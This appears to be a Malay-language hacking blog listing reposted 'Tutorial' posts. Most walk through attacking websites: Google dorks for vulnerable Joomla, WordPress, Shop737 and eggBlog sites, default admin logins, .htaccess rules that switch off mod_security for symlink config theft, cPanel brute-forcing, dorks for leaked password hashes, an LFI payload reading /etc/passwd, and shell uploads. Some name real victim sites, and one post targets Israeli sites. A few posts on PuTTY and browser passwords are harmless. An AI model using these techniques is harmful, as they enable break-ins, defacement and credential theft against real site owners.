Showing posts with label Tutorial. Show all posts
Crack Hash Password
By : QifwhysoseriousHari ni saya akan tunjukkan bagaimana cara nak crack macam2 jenis hash tanpa wordlist dan ia amat bagus dan senang diguna.
Download
Sumber dari Mafia-Sec
Tag :
Tutorial,
Automatic Joomla Password Changer
By : QifwhysoseriousKali ini saya akan berkongsi berkaitan tool Joomla , iaitu dapat mass Joomla Password Changer .Yang menariknya korang tak payah symlink cara manual dan menyari website joomla . Tool ini akan bersiap sedia menjalankan kerja nya .
Tanda ' Successful ' maknanya anda sudah berjaya mass .
Tanda ' Failed ' maknanya ada masalah di bahagian ' administrator '
Selepas itu masukkan username dan password ini di administrator Joomla
Username : Admin
Password : 1
Login Successfully =)
Download Here
Sumber dari Mafia-Sec
Tag :
Tutorial,
JCE Exploiter
By : QifwhysoseriousMula-2 Download
Google Dork : inurl:"/index.php?option=com_jce"
inurl:index.php?option=com_virtuemart
Jika tidak keluar apa2 itu tandanya web patch atau tidak vuln .
Exploit JCE ini masih fresh walaupun exploit ini sejak 2009 . Best exploit .
Sumber dari Mafia-Sec
Tag :
Tutorial,
Automatic Joomla Mass Deface
By : QifwhysoseriousSebagai tutorial ini GSEC sudah buat satu video .
Dan Qualiti video ini sangat buruk . Maaf . Tetapi boleh lebih jelas hanya tukar Qualiti ke 480 p .
Video
Download File
Password download : mansyk3z
Sumber dari Mafia-Sec
Tag :
Tutorial,
Bypass Symlink Error
By : QifwhysoseriousMungkin,ramai PENGGODAM/DEFACER mengalami masalah apabila mendapat sebuah server ataupun shell . Disitu apabila ingin SYM , tiba-tiba ada mengalami Forbidden,Internal Server Error dan 404 NOT FOUND . Baiklah kali ini saya akan tunjuk cara ingin bypass Error itu .
Bypass symlink dengan .htaccess/code . Copy code dan upload di shell ok .
Code .htaccess untuk bypass Forbidden :
* Options FollowSymLinks MultiViews Indexes ExecCGI
* Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php
* Options All DirectoryIndex ssss.html addType txt .php AddHandler txt .php <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>
* Options All ReadMeName 1.txt
* suPHP_ConfigPath /home/user/public_html/php.ini
* Options all
* Options +FollowSymLinks DirectoryIndex Sux.html Options +Indexes AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html
* Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php <IfModule mod_autoindex.c> IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble </ifModule> <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>
Code untuk bypass Python Script Sym .py :
* AddType application/x-httpd-cgi .py AddHandler cgi-script .py AddHandler cgi-script .py
Code untuk bypass Perl Script Sym .pl :
* AddType application/x-httpd-cgi .pl AddHandler cgi-script .pl AddHandler cgi-script .pl
Code untuk membolehkan Fungsi Symlink yang telah dilumpuhkan :
* <Directory "/home"> *** Options -ExecCGI* *** AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks </Directory>
Code untuk mendapatkan kebenaran dari server :
* AddType text/plain .php Options +Indexes DirectoryIndex filename.html
Code Bypass Internal Server Error :
*<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>
Code Tukar Versi PHP dari Server :
*AddType application/x-httpd-php4 .php
Code Ambil Config dengan kaedah gambar :
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .gif
AddHandler cgi-script .gif
AddHandler cgi-script .gif
Sumber dari Mafia-Sec
Tag :
Tutorial,
Wordpress Scanner v.1
By : QifwhysoseriousBaiklah kali ni saya akan berkongsi Wordpress Scanner . Dengan Cara pemakaian ini korang mesti lah install python 2.5/2.7 di Code oleh Mauritania Attacker . My Lovely Brother :D . Tools ini berfungsi menginject web yang berCMS Wordpress . Hanya letak website target anda ^_^ . Method yang di jalankan SQLI ,RFI,CGI
Bila sudah download , copy/cut file wordpress ke C:/ dan bukak cmd jalankan
cd/
cd /wordpress
wordpress.py
Download
Sumber dari Mafia-Sec
Tag :
Tutorial,
Hack Email Guna Google
By : QifwhysoseriousSeperti yang kita tahu , Google tidak melakukan sebarang penapisan dan tidak menyembunyikan
File External . Jadi aku akan tunjuk cara yang mudah supaya korang mudah dapat dan faham :D
Just pergi ke : www.Google.com
Untuk cari account @facebook type ni kat google :
ext:sql intext:@facebook.com intext:e10adc3949ba59abbe56e057f20f883e
Untuk cari account @Gmail :
ext:sql intext:@gmail.com intext:e10adc3949ba59abbe56e057f20f883e
Untuk cari account @Yahoo :
ext:sql intext:@yahoo.com intext:e10adc3949ba59abbe56e057f20f883e
*Secara dasarnya , korang dah boleh nampak kan ? Kalau nak cari domain lain
just tukar @yahoo.com jadi domain @hotmail pulak ker . Simple sangat tutorial ni .
Sumber dari Mafia-Sec
Tag :
Tutorial,
Bypass etc/passwd
By : QifwhysoseriousDengan tools ini korang boleh bypass etc/password . Server mestilah bypass .
Click di bahagian /etc/passwd dan click submit .
Jika ada keluar error itu maksudnya server secure . Enjoy .
Download
Sumber dari Mafia-Sec
Tag :
Tutorial,
Cara Crack Cpanel Menggunakan Config Symlink
By : QifwhysoseriousBahan2 yang anda perlukan .
1) Python27
2) Script python [ss.py] wordlist
3) Cpanel Brute Force
4) Symlink Bypassed [CONFIG]
Download dulu file nya ..
http://www.mediafire.com/?8f8k4j5ve12z49f <-- ss.py
http://www.mediafire.com/?925c2a0y79944n6 <-- Cpanel Brute Force
Selepas Python27 sudah install , masukkan file ss.py ke dalam C:\Python27 Dan buat nama satu folder apa2 .. Contoh nama 'Man Kacak' pun boleh
Setelah itu , bukak cmd dan type .
CD/
cd python27
ss.py htttp://site.com/namasymlinkanda [nama folder symlinked yang anda buat ]
Tunggu Scan sampai habis nanti akan dapat result begini .
Upload pulak Cpanel Brute Force .
Tekan user di bawah untuk mendapatkan user dari server terus masukkan ke dalam kotak 'USER' dan Masukkan pulak 'PASS' yang telah di crackkan tadi dan masukkan ke dalam 'PASS'
Yeyyy ! Dah dapat cpanel !! Kalau korang dapat banyak config banyak lah cpanel ..
Macam mana nak login ? pergi check dekat shell balik ambik server ip .
Contoh : 1212.1223.12:2082
Sumber dari Mafia-Sec
Tag :
Tutorial,
Hack Joomla Dan Wordpress
By : QifwhysoseriousSaya akan tunjukkan 'METHOD TERBAIK' cara Hack Joomla Dan Wordpress . Ini bukanlah exploit contoh exploit selalu terdapat di bahagian Components & Plugins . Dengan Exploit boleh memakai banyak method seperti reset admin/password ,SQL,XSS,dll..
Dengan Tools ini saya akan tunjukkan cara menggunakan tools ini , Tools ini sebenarnya adalah PRIV8 ,
Pertama , kita akan menggunakan 'BEST SEARCHER' lagi bagus dari google karna ia amat pantas untuk mencari website .
Pertama , Click Tumunu Isaretle untuk memilih semua method dan di dalam ruang berwarna hitam perlu meletakkan DORKS . korang boleh letak banyak DORKS sebagai target .
Selepas itu . pergi ke Ruang ke dua click MENU TARAMA dan click Taramaya Basla . Apabila Research sudah habis/siap click Kaydet dan save file text .
Contoh saya akan hack bberapa site israel menggunakan joomla/wordpress DORKS .
Untuk Joomla
site:il com_user.israel
site:il option=
site:il templates/beez/
site:il template/atomic
site:il com_user.shalom
site:il com_user.shalit
Untuk Wordpress
site:il wp-content
site:il powered by wordpress
site:il wp-content/themes
site:il wp-content/plugins
site:il ?p= wordpress
Dan selepas itu kita akan menggunakan BEST CRACKER
Jangan lupa bila nak hack joomla atau wordpress pilih salah satu dulu , Sekarang kita perlukan wordlist yang bagus ,
Tekan sifre kelimelistesi untuk memilih password list dan click site ekle untuk memilih website yang file text waktu kita Searcher website tadi .dan click Basla untuk memulakan serangann !!
Saya uploadkan file programs dan wordlist cun cun punya .
Download sini
Sumber dari Mafia-Sec
Tag :
Tutorial,
Deface Dengan Upload File Di Shop737
By : QifwhysoseriousKali ini saya akan berkongsi exploit Upload file Di Cms Shop737 . Exploit ini amat mudah .
Google Dork : intext:"Powered by Shop737"
1) Pilih target website .
2 ) Kemudian tambah /upload.php Seperti site.com/poto/upload.php . Contoh: http://lagudrumband.com/poto/upload.php
3) Masukkan user + pass
username : admin
pass : admin
4) Jika gagal masuk , coba website lain :)
5) Setelah berjaya masuk tampilan akan jadi begini .
6) Hanya file extension .txt/.jpg sahaja yg boleh di upload .
7) Pilih kategori dan upload file anda dan klik Upload :)
8) Jike file sukses di upload
hasil upload berjaya di : localhost/poto/[kategori]/file.txt . Contoh http://lagudrumband.com/poto/x/x.txt
Sumber dari Mafia-Sec
Tag :
Tutorial,
Cara Membuat Software Portable
By : QifwhysoseriousEntry hari ni aku nak ajar korang cara nak buat software portable sendiri.
Software portable? Untuk yang belum tahu software portable ni adalah software yang kita tak perlu install untuk guna.Cuma click dan boleh terus guna.Software portable ni selalunya adalah kecil dari segi saiz dan sangat berguna untuk yang ingin menggunakan software dimana-mana sahaja sebabnya boleh dimasukkan ke dalam pendrive .
1. Mula-mula korang download software Cameyo di lama web rasmi Cameyo : Cameyo
2. Lepas dah download, buka software cameyo tu.Korang tak perlu install pun sebab software Cameyo ni pun dalam bentuk portable.
Lepas buka akan keluar macam ni :
Sekarang korang kena register account Cameyo.
Isi e-mail, password dan confirm password.
Tanda I will mostlu use Cameyo for : Personal
Lepas tu register!
3. Lepas dah verify email sekarang korang login account Cameyo korang di software Cameyo.Click I already have an account :
4. Lepas dah login akan keluar macam gambar dibawah :
Click Capture app locally (gambar kamera)
lepas tu akan keluar popup dekat System Tray komputer korang.Rujuk gambar :
Tunggu sampai dia habis scan.
5. Selepas dah habis scan, akan keluar macam ni :
Sekarang korang kena install software yang korang nak tukarkan kepada portable.Dalam tuto ni aku akan install software Notepad ++.
6. Selepas dah install korang click Install Done dekat popup Cameyo tadi.Cameyo akan scan lagi sekali.
Tunggu sampai siap dan akan keluar popup Success :
Kalau keluar popup macam ni, maksudnya Cameyo dah berjaya create software portable korang tu.Korang boleh guna terus software portable korang tu atau click Edit package untuk edit software portable korang tu.
Untuk tengok hasil software portable korang tu korang masuk ke Documents > Cameyo. dalam folder ni ada software portable korang tu!
Software portable yang korang buat tadi dah boleh digunakan dimana-mana sahaja .
Semoga berjaya .
Download Notepad++ Portable yang Reaperz buat tadi : Notepad++ Portable
Sumber dari Reaperz
Tag :
Tutorial,
Tutorial Menggunakan Putty
By : QifwhysoseriousSeperti yang aku janji aku akan ajar pulak cara nak menggunakan PuTTY.Bagi yang belum tahu lagi apa itu PuTTY boleh rujuk entry sebelum ni :
Apa itu PuTTY dan Kegunaannya
Sebelum kita menggunakan PuTTY kita kena aktifkan dulu Port SSH.
=> di fedora=> service sshd start “untuk mengaktifkan port ssh”
=> chkconfig sshd on “servis aktif terus berjalan”
jika untuk mengetahui sshd sudah terinstall belum :
service sshd status
jika failed maksudnya ssh belum diinstall jadi korang kena install openssh dulu :
Cara menggunakan PuTTY :
Buka software PuTTY yang korang download dan akan keluar lebih kurang macam gambar dibawah :
1. Langkah awal menggunakannnya
2. Sekarang masa untuk mengisi login.Login as dan Password mestilah sama dengan pc yang korang nak remote.
3. Bila korang dah berjaya connect, sekarang korang kena akses sebagai Full Administrator komputer linux yang kita remote itu.Maksudnya login sebagai ROOT.
Siap.
Simple ja kan ? Sekarang korang boleh la guna commands linux untuk copy,browse,edit atau apa2 saja dengan computer yang korang remote tu.
Sumber dari Reaperz
Tag :
Tutorial,
Apa Itu Putty Dan Kegunaannya ?
By : QifwhysoseriousEntry ni aku nak share tentang satu software iaitu PuTTY.Apa sebenarnya PuTTY ni dan kegunaannya?
Ok Jom layan....
Putty adalah software remote console/ terminal yang digunakan untuk buat remote connection komputer melalui Port SSH atau sebagainya.
Dibawah aku sediakan pertanyaan lazim tentang PuTTY :
1. Apakah nama penuh SSH?
- SSH bermaksud Secure Shell
2. Apa yang dimaksudkan dengan SSH?
- SSH adalah protokol jaringan yang membolehkan pertukaran data melalui saluran antara dua perangkat jaringan.
3. Adakah kegunaan PUTTY yang lain?Jelaskan!
- Ada beberapa kegunaan PUTTY yang lain yaitu untuk meremote komputer dengan terhubungnya menggunakan Port SSH dan sebagainya.
4. Apa yang dimaksud dengan Rlogin?
- Rlogin adalah suatu sistem yang memudahkan kita untuk masuk dari sistem 1 ke sistem 2 dengan tanpa meminta password root lagi.
5. Apa definisi sederhana dan mudah memahami apa itu PUTTY?
- PUTTY adalah software remote console atau terminal yang digunakan untuk meremote komuter dengan terhubungnya menggunakan Port SSH dan sebagainya.
6. Apakah nama penuh TCP?
- Transmission Control Protokol
7. Adakah PUTTY telah tersiap ada atau perlu didownload terlebih dahulu? Apa nama webnya?
- PUTTY perlu didownload. Laman web untuk download PuTTY : http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
8. Aplikasi apa saja yang dapat dilakukan dengan menggunakan PUTTY?
- aplikasi yang dapat dilakukan dengan menggunakan PUTTY yaitu SSH,telnet,rlogin,dan baku TCP protokol komputasi dan sebagai konsol serial klien
9. Apa manfaat yang kita peroleh dari program PUTTY?
- manfaatnya ialah kita dapat menerima data dari komputer lain secara remote.
10. PUTTY adalah aplikasi yang dapat bertindak sebagai klien untuk apa saja?
- PUTTY adalah aplikasi yang bertindak sebagai klien untuk menerima data,mengirim data,dan untuk meremote komputer dengan terhubungnya menggunakan Port SSH dan sebagainya
11. Mengapa PUTTY bertindak sebgai klien untuk SSH?
- PUTTY bertindak sebagai klien untuk SSH kerana PUTTY adalah aplikasi yang bertindak sebagai klien.
12. Bilakah program PUTTY dicipta?
- Program PUTTY dicipta pada bulan Oktober tahun 2000
13. Siapa yang membuat PUTTY?
- yang membuat PUTTY adalah Simon Tatham
14. Bilakah PUTTY digunakan dan apa fungsinya bagi penggunanya?
- Aplikasi PUTTY digunakan ketika anda ingin mentransfer sebuah data dari komputer 1 ke komputer lain dan fungsi bagi penggunanya dapat menerima data.
15. Bolehkah PUTTY digunakan jika tiada sambungan internet?
- Ya.Boleh.
16. Aplikasi PUTTY boleh digunakan di windows XP selain windows X,windows apa saja yang boleh PUTTY gunakan untuk melakukan programnya?
- Windows 7 dan Windows Vista
Baiklah itu saja untuk post kali ini.harap korang dah faham tentang apa itu PuTTY dan kegunaannya. Nantikan entry seterusnya aku akan ajar cara nak guna PuTTY pula.
Sumber dari Reaperz
Tag :
Tutorial,
Hacking LFI/RFI Dengan Fimap
By : QifwhysoseriousEntry hari ini aku nak ajar korang cara nak hack dan pentest website dengan menggunakan tool yang bernama Fimap. Fimap ni sebenanrnya tool scanner yang ditulis dalam bahasa programming Python untuk teknik hacking Local File Inclusion (LFI) dan Remote File Inclusion (LFI).
Baiklah dalam tutorial ni aku akan tunjuk step-step menggunakan tool Fimap ni.Fimap ni boleh digunakan dalam Windows atau Linux.Dalam tutorial ni aku akan menggunakan Ubuntu 13.04.
Apa yang diperlukan :
1. Tool Fimap : https://code.google.com/p/fimap/downloads/detail?name=fimap_alpha_v09.tar.gz&can=2&q=
(Untuk windows sahaja ) :
Python : http://www.python.org/download/
note :Untuk pengguna Windows korang kena download Python dan Fimap.Untuk pengguna Linux korang cuma perlu download Fimap sahaja.
note2 : Untuk pengguna Backtrack, korang tak perlu download apa-apa.Semua dah siap ada.
2. Selepas dah download, install python ( windows) dan extract file fimap.Untuk memudahkan kerja, rename folder fimap tu dari fimap_alpha_v09 kepada fimap.
3. Selepas tu "cd" ke dalam folder fimap tersebut.Untuk windows aku cadangkan letak dalam drive C:/
dan untuk Linux aku cadangkan letak dalam Home.
Windows :
Buka cmd dan masukkan command :
cd C:/fimap
Linux :
Buka Terminal dan masukkan command :
cd fimap
Untuk Backtrack masukkan command :
cd /pentest/web/fimap
4. Baiklah sekarang masanya untuk kita mula menggunakan tool Fimap ni.Aku akan paparkan commands untuk fimap.Commands ni boleh digunakan pada Windows dan Linux.Untuk windows pastikan korang dah install python dan pastikan dah cd folder fimap.
Baiklah dibawah aku senaraikan commands yang korang perlu tahu :
Scan Sesuatu Laman Web Untuk Vulnerable RFI/LFI :
./fimap.py -u http://www.example.com/test.php?file=bang&id=23
Search Google untuk laman web yang vulnerable kepada RFI/LFI dengan Google Dork :
./fimap.py -g -q inurl:include.php
note: gantikan inurl:include.php dengan google dork RFI/LFI korang.
Mencari dan mengeluarkan list url yang vuln RFI/LFI dalam sesuatu laman web :
./fimap.py -H -u 'http://www.example.com' -d 3 -w /tmp/urllist
Ni antara commands basic yang korang perlu tau untuk menggunakan tool fimap ni.Nak lagi?
Boleh rujuk commands penuh di laman rasmi fimap :
Baiklah itu saja untuk tutorial ni . Semoga berjaya .
Sumber dari Reaperz
Tag :
Tutorial,
Cara Memasang Password Pada Mozilla Firefox
By : QifwhysoseriousSeperti yang aku janji aku akan ajar korang cara nak pasang password pada Mozilla Firefox pula.
Sebelum ni aku ada ajar cara pasang password pada google chrome.Belum baca lagi? jom baca : Cara Memasang Password Pada Google Chrome
Ok jom mula....
1. Mula-mula korang kena download add-on untuk mozilla firefox yang bernama Master Password+.
Download : Master Password+
2. Lepas dah install add-on master password, korang tekan Firefox > Options > Options
3. Lepas tu ada popup keluar.Klik dekat Tab Security.
Tick dekat kotak Use a master password.
4. Kemudian akan keluar popup lagi.
Masukkan Password yang korang nak dekat kotak Enter new password dan Re-enter new password. Kotak current password korang biarkan sebab ni first time korang setting.
Lepas tu dekat bawah tu click Tab Startup dan tick pada kotak Ask for password on startup.
Click OK
Kemudian akan keluar popup kata successful.
5. Sekarang korang tutup firefox korang.Kemudian buka balik, akan ada popup keluar mintak password!
Bagi yang tak faham lagi jom layan video pulak :
Selamat mencuba .
Sumber dari Reaperz
Tag :
Tutorial,
Cara Memasang Password Pada Google Chrome
By : QifwhysoseriousHari ni aku nak ajar cara nak set password dekat web browser Google Chrome
Kenapa nak pasang password? Mungkin ada yang mahukan privasi dekat web browser mereka.Lebih-lebih lagi bagi mereka yang berkongsi komputer.Mungkin ada maklumat2 penting di dalam browser mereka.
Ok jom....
Google Chrome
1. Korang cuma perlu download Extension untuk Chrome.
Download : Simple Startup Password
2. Selepas dah install extension simple startup password, masuk ke Tools > Extensions dalam google chrome.
Kemudian dekat extension Simple Startup Password korang click Option.
Gambar:
Lepas tu akan keluar page baru ada kotak untuk isi password.Isi kotak tu dengan password yang korang nak dan tekan Save.
Selepas dah save korang tutup google chrome korang.kemudian buka balik dan akan keluar popup suruh masukkan password
Ok itu saja...semoga korang enjoy dan dapat selamatkan browser korang . Tutorial yang seterusnya aku akan ajar cara nak set password dekat Mozilla Firefox pulak .
Sumber dari Reaperz
Tag :
Tutorial,
Joomla Component Com_shohada Lfi Vulnerability
By : QifwhysoseriousEntry hari ini aku nak share exploit joomla component com_shohada. component joomla ini terdedah kepada serangan Local File Inclusion atau LFI.
1. Mula-mula cari website sasaran dengan google dork.(copy dan paste dekat google).
Dork : inurl:com_shohada
2. Kemudian pilih mana2 website yang korang nak.
Ok aku dah dapat satu website :
http://gorgab.com/index.php?option=com_shohada&view=shohada
3. Sekarang gantikan url laman web korang tu dengan :
index.php?option=com_shohada&controller=
Jadi website tadi akan jadi :
http://gorgab.com/index.php?option=com_shohada&controller=
4. Sekarang masa untuk kita serang guna LFI.
Tempat korang nak serang tu :
http://gorgab.com/index.php?option=com_shohada&controller=[LFI DI SINI]
Kemudian masukkan exploit :
http://gorgab.com/index.php?option=com_shohada&controller=../../../../../../../../../../etc/passwd
Tengok yang BIRU tu exploit LFI.kalau tak jadi, buang dihujung tu.Kalau tak jadi jugak maksudnya web tu tak vulnerable.
Rujuk gambar :
Ni maksudnya website tu vulnerable! Sekarang korang boleh lah upload shell guna User-Agent.
Tutorial upload shell LFI tengok di sini :
Sumber dari Reaperz
Tag :
Tutorial,
Eggblog 412 Arbitrary File Upload Deface
By : QifwhysoseriousExploit ni korang boleh upload file macam shell dan deface.
1. Google Dork :
"powered by eggBlog.net"
2. Buka mana2 web yang korang dapat kat google, dan tambah kat hujung url :
/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
contoh korang dapat http://site.com/
Tukar ke :
http://site.com/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
3. Kemudian korang akan nampak lebih kurang macam ni :
Ok bila dah keluar macam ni, tekan choose file dan pilih la shell korang! shell tu korang kena rename jadi shell.php.jpg .
Lepas tu tekan Upload :D
note1 : main2 dengan extension file untuk upload.hehe
note2: Kalau tak keluar mcm ni maksudnya web tu x vuln.cari web lain.
4. Lepas dah upload shell, untuk tengok hasil korang cari nama shell korang kat tepi tu dan click.Nanti akan ada keluar link shell korang tu dekat kotak image url.rujuk gambar :
Ataupun tukar kat hujung url :
/photos/uploads/shell.php.jpg
Ok siap! happy defacing.
Live demo : http://www.knallkopf.ch/blog/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
http://www.mrcromwellsattic.com/blog/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
Sumber dari Reaperz
Tag :
Tutorial,










































